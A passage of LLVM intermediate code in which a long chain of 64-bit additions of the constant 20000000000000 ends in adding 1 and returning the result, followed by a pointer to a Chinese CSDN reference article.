%265 = add nsw i64 %264, 20000000000000
%266 = add nsw i64 %265, 20000000000000
%267 = add nsw i64 %266, 20000000000000
%268 = add nsw i64 %267, 20000000000000
%269 = add nsw i64 %268, 20000000000000
%270 = add nsw i64 %269, 20000000000000
%271 = add nsw i64 %270, 20000000000000
%272 = add nsw i64 %271, 20000000000000
%273 = add nsw i64 %272, 20000000000000
%274 = add nsw i64 %273, 20000000000000
%275 = add nsw i64 %274, 20000000000000
%276 = add nsw i64 %275, 20000000000000
%277 = add nsw i64 %276, 20000000000000
%278 = add nsw i64 %277, 20000000000000
%279 = add nsw i64 %278, 20000000000000
%280 = add nsw i64 %279, 20000000000000
%281 = add nsw i64 %280, 20000000000000
%282 = add nsw i64 %281, 20000000000000
%283 = add nsw i64 %282, 20000000000000
%284 = add nsw i64 %283, 20000000000000
%285 = add nsw i64 %284, 20000000000000
%286 = add nsw i64 %285, 20000000000000
%287 = add nsw i64 %286, 20000000000000
%288 = add nsw i64 %287, 20000000000000
%289 = add nsw i64 %288, 20000000000000
%290 = add nsw i64 %289, 20000000000000
%291 = add nsw i64 %290, 20000000000000
%292 = add nsw i64 %291, 20000000000000
%293 = add nsw i64 %292, 20000000000000
%294 = add nsw i64 %293, 20000000000000
%295 = add nsw i64 %294, 20000000000000
%296 = add nsw i64 %295, 20000000000000
%297 = add nsw i64 %296, 20000000000000
%298 = add nsw i64 %297, 20000000000000
%299 = add nsw i64 %298, 20000000000000
%300 = add nsw i64 %299, 20000000000000
%301 = add nsw i64 %300, 20000000000000
%302 = add nsw i64 %301, 20000000000000
%303 = add nsw i64 %302, 20000000000000
%304 = add nsw i64 %303, 20000000000000
%305 = add nsw i64 %304, 20000000000000
%306 = add nsw i64 %305, 20000000000000
%307 = add nsw i64 %306, 20000000000000
%308 = add nsw i64 %307, 20000000000000
%309 = add nsw i64 %308, 20000000000000
%310 = add nsw i64 %309, 20000000000000
%311 = add nsw i64 %310, 20000000000000
%312 = add nsw i64 %311, 20000000000000
%313 = add nsw i64 %312, 20000000000000
%314 = add nsw i64 %313, 20000000000000
%315 = add nsw i64 %314, 1
ret i64 %315
}参考文章
https://blog.csdn.net/weixin_46483787/article/details/125199780
